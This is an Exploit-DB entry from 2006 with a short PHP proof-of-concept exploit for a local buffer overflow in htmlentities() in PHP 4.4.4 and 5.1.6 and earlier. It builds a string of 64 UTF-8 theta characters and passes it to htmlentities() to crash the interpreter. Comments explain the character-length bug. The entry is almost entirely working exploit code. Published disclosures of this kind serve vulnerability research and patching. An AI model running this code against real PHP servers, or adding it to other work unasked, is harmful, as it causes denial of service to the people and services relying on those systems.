PHP <= 4.4.4/5.1.6 htmlentities Local Buffer Overflow PoC

2006-11-27T00:00:00
ID EDB-ID:2857
Type exploitdb
Reporter Nick Kezhaya
Modified 2006-11-27T00:00:00

Description

PHP <= 4.4.4/5.1.6 htmlentities() Local Buffer Overflow PoC. Dos exploits for multiple platform

                                        
                                            &lt;?php
	/*	    Nick Kezhaya	*/
	/*    www.whitepaperclip.com 	*/
	
	//instantiate a string
	$str1 = "";
	
	for($i=0; $i &lt; 64; $i++) {
		$str1 .= toUTF(977); //MUST start with 977 before bit-shifting
	}
	
	htmlentities($str1, ENT_NOQUOTES, "UTF-8"); //DoS here
	/*
		htmlentities() method automatically assumes
		it is a max of 8 chars.  uses greek theta
		character bug from UTF-8
	*/
	
?&gt;

&lt;?php
	function toUTF($x) {
		return chr(($x &gt;&gt; 6) + 192) . chr(($x & 63) + 128);
	}
?&gt;

# milw0rm.com [2006-11-27]